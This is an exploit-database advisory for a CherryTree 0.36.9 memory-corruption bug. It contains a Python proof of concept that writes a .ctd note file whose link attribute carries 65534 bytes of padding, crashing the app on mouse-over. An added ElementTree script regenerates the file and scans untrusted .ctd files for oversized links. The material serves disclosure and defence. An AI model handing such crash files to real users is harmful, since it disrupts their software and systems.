CherryTree 0.36.9 Memory Corruption

2016-10-27T00:00:00
ID PACKETSTORM:139372
Type packetstorm
Reporter n30m1nd
Modified 2016-10-27T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
  
### CherryTree 0.36.9 - Memory Corruption PoC by n30m1nd ###   
  
# Date: 2016-10-27  
# PoC Author: n30m1nd  
# Vendor Homepage: http://www.giuspen.com/cherrytree/  
# Software Link: http://www.giuspen.com/software/cherrytree_0.36.9_setup.exe  
# Version: Affects all versions of CherryTree prior to 0.37.6  
# Tested on: Win7 64bit and Win10 64 bit  
  
# Credits  
# =======  
# Thanks to Giusepe Penone for this invaluable piece of free, open source software and also for quickly patching this vuln.  
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better  
  
# How to  
# ======  
# * Run this python script. It will generate a "PoC-1.ctd" file.  
# * Open the file and hover over the link.  
# Bonus  
# =====  
# It will also crash if you click on the link (but it will also make your graphic drivers stop working sometimes...)  
  
# Why?  
# ====  
# For what we have seen debugging the crash (thanks R0c0!), it happens inside libcairo2.0.dll due to a null pointer reference when  
# trying to draw the contents of the graphical bitmaps.  
  
# Exploit code  
# ============  
  
crashfile = '''<?xml version="1.0" ?>  
<cherrytree>  
<node custom_icon_id="0" foreground="" is_bold="False" name="PoC" prog_lang="custom-colors" readonly="False" tags="" unique_id="1">  
<rich_text link="node 1 '''+ "A"*65534 + '''">MOUSE OVER THIS</rich_text>  
</node>  
</cherrytree>  
'''  
  
with open("PoC-1.ctd", 'w') as f:  
f.write(crashfile)  
f.close()  
  
`
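As an added example (not part of the original advisory and not CherryTree's own code), the script below rebuilds the PoC document with ElementTree so that the padding length is a parameter rather than a literal, and adds the triage check a defender would want: parse a .ctd before opening it in a pre-0.37.6 CherryTree and flag any rich_text link attribute that is far longer than a node link has any reason to be. The 4096-byte threshold, the function names and the command-line layout are assumptions of this example; the advisory itself only states that 65534 bytes of padding crashes the renderer.

```python
import sys
import xml.etree.ElementTree as ET

# Threshold for flagging a link attribute. This is an assumption of this example:
# a CherryTree node link is normally short ("node <unique_id>" plus an optional
# anchor), so a link in the kilobyte range has no legitimate use. The advisory
# only establishes that 65534 bytes of padding is enough to crash the renderer.
MAX_LINK_LEN = 4096


def build_ctd(link_value, text="MOUSE OVER THIS"):
    """Build a minimal .ctd document with the same shape as the PoC; return bytes.

    Using ElementTree instead of string concatenation keeps the document
    well-formed for any link_value (quotes, '<' and '&' are escaped), so the
    length of the link is the only variable under test.
    """
    root = ET.Element("cherrytree")
    node = ET.SubElement(root, "node", {
        "custom_icon_id": "0", "foreground": "", "is_bold": "False", "name": "PoC",
        "prog_lang": "custom-colors", "readonly": "False", "tags": "", "unique_id": "1",
    })
    rich_text = ET.SubElement(node, "rich_text", {"link": link_value})
    rich_text.text = text
    # xml_declaration=True requires Python 3.8 or newer.
    return ET.tostring(root, encoding="utf-8", xml_declaration=True)


def oversized_links(ctd_bytes, max_len=MAX_LINK_LEN):
    """Return [(node unique_id, link length), ...] for every rich_text whose
    link attribute is longer than max_len; an empty list means nothing flagged.

    .ctd nodes can nest, so root.iter("node") walks every node while
    findall() only looks at that node's direct rich_text children, so no
    element is counted twice.
    """
    root = ET.fromstring(ctd_bytes)
    hits = []
    for node in root.iter("node"):
        node_id = node.get("unique_id", "?")
        for rich_text in node.findall("rich_text"):
            link = rich_text.get("link")
            if link is not None and len(link) > max_len:
                hits.append((node_id, len(link)))
    return hits


def write_poc(path="PoC-1.ctd", padding=65534):
    """Regenerate the advisory's crash file with a configurable amount of padding."""
    data = build_ctd("node 1 " + "A" * padding)
    with open(path, "wb") as f:
        f.write(data)
    return data


if __name__ == "__main__":
    # Usage: scan_ctd.py [file.ctd ...]
    # With no arguments: write PoC-1.ctd (same payload as the advisory) and scan it.
    if len(sys.argv) == 1:
        print("PoC-1.ctd:", oversized_links(write_poc()))
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            hits = oversized_links(f.read())
        print(path, "suspicious link attributes:" if hits else "clean", hits)
```

Run with no arguments to regenerate the PoC and confirm the scanner catches it (it reports node "1" with a 65541-byte link: the 7-byte "node 1 " prefix plus the padding); pass one or more .ctd paths to check documents from untrusted sources before opening them. The scan itself only parses XML and never renders anything, so it is safe to run on a hostile file.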